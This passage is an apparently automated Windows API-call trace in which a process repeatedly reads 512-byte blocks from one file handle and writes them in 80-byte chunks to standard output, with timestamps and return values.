returned 0x4c [0115.071] GetFileType (hFile=0x4c) returned 0x1 [0115.071] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.071] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.071] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.072] GetFileType (hFile=0x4c) returned 0x1 [0115.072] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.072] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.072] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.072] GetFileType (hFile=0x4c) returned 0x1 [0115.072] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.072] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.072] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.072] GetFileType (hFile=0x4c) returned 0x1 [0115.072] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.072] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.072] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.072] GetFileType (hFile=0x4c) returned 0x1 [0115.072] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.072] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.072] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.072] GetFileType (hFile=0x4c) returned 0x1 [0115.072] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.072] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.072] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.072] GetFileType (hFile=0x4c) returned 0x1 [0115.072] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.072] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.072] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.072] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.072] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.072] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.072] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.072] GetFileType (hFile=0x4c) returned 0x1 [0115.072] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.072] GetFileType (hFile=0x4c) returned 0x1 [0115.072] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.072] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.073] GetFileType (hFile=0x4c) returned 0x1 [0115.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.073] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.073] GetFileType (hFile=0x4c) returned 0x1 [0115.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.073] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.073] GetFileType (hFile=0x4c) returned 0x1 [0115.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.073] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.073] GetFileType (hFile=0x4c) returned 0x1 [0115.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.073] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.073] GetFileType (hFile=0x4c) returned 0x1 [0115.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.073] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.073] GetFileType (hFile=0x4c) returned 0x1 [0115.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.073] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.073] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.073] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.073] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.073] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.073] GetFileType (hFile=0x4c) returned 0x1 [0115.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.073] GetFileType (hFile=0x4c) returned 0x1 [0115.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.073] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.074] GetFileType (hFile=0x4c) returned 0x1 [0115.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.074] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.074] GetFileType (hFile=0x4c) returned 0x1 [0115.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.074] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.074] GetFileType (hFile=0x4c) returned 0x1 [0115.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.074] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.074] GetFileType (hFile=0x4c) returned 0x1 [0115.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.074] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.074] GetFileType (hFile=0x4c) returned 0x1 [0115.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.074] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.074] GetFileType (hFile=0x4c) returned 0x1 [0115.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.074] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.074] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.074] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.074] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.074] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.074] GetFileType (hFile=0x4c) returned 0x1 [0115.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.075] GetFileType (hFile=0x4c) returned 0x1 [0115.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.075] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.075] GetFileType (hFile=0x4c) returned 0x1 [0115.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.075] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.075] GetFileType (hFile=0x4c) returned 0x1 [0115.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.075] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.075] GetFileType (hFile=0x4c) returned 0x1 [0115.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.075] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.075] GetFileType (hFile=0x4c) returned 0x1 [0115.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.075] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.075] GetFileType (hFile=0x4c) returned 0x1 [0115.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.075] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.075] GetFileType (hFile=0x4c) returned 0x1 [0115.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.076] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.076] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.076] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.076] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.076] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.076] GetFileType (hFile=0x4c) returned 0x1 [0115.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.076] GetFileType (hFile=0x4c) returned 0x1 [0115.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.076] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.076] GetFileType (hFile=0x4c) returned 0x1 [0115.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.076] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.076] GetFileType (hFile=0x4c) returned 0x1 [0115.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.076] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.076] GetFileType (hFile=0x4c) returned 0x1 [0115.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.076] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.076] GetFileType (hFile=0x4c) returned 0x1 [0115.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.076] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.076] GetFileType (hFile=0x4c) returned 0x1 [0115.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.076] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.077] GetFileType (hFile=0x4c) returned 0x1 [0115.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.077] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.077] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.077] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.077] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.077] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.077] GetFileType (hFile=0x4c) returned 0x1 [0115.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.077] GetFileType (hFile=0x4c) returned 0x1 [0115.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.077] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.077] GetFileType (hFile=0x4c) returned 0x1 [0115.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.077] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.077] GetFileType (hFile=0x4c) returned 0x1 [0115.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.077] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.077] GetFileType (hFile=0x4c) returned 0x1 [0115.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.077] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.077] GetFileType (hFile=0x4c) returned 0x1 [0115.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.077] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.077] GetFileType (hFile=0x4c) returned 0x1 [0115.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.077] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.078] GetFileType (hFile=0x4c) returned 0x1 [0115.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.078] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.078] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.078] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.078] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.078] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.078] GetFileType (hFile=0x4c) returned 0x1 [0115.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.078] GetFileType (hFile=0x4c) returned 0x1 [0115.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.078] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.078] GetFileType (hFile=0x4c) returned 0x1 [0115.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.078] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.078] GetFileType (hFile=0x4c) returned 0x1 [0115.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.078] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.078] GetFileType (hFile=0x4c) returned 0x1 [0115.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.078] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.078] GetFileType (hFile=0x4c) returned 0x1 [0115.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.078] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.078] GetFileType (hFile=0x4c) returned 0x1 [0115.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.078] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.079] GetFileType (hFile=0x4c) returned 0x1 [0115.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.079] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.079] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.079] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.079] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.079] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.079] GetFileType (hFile=0x4c) returned 0x1 [0115.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.079] GetFileType (hFile=0x4c) returned 0x1 [0115.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.079] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.079] GetFileType (hFile=0x4c) returned 0x1 [0115.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.079] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.079] GetFileType (hFile=0x4c) returned 0x1 [0115.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.079] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, 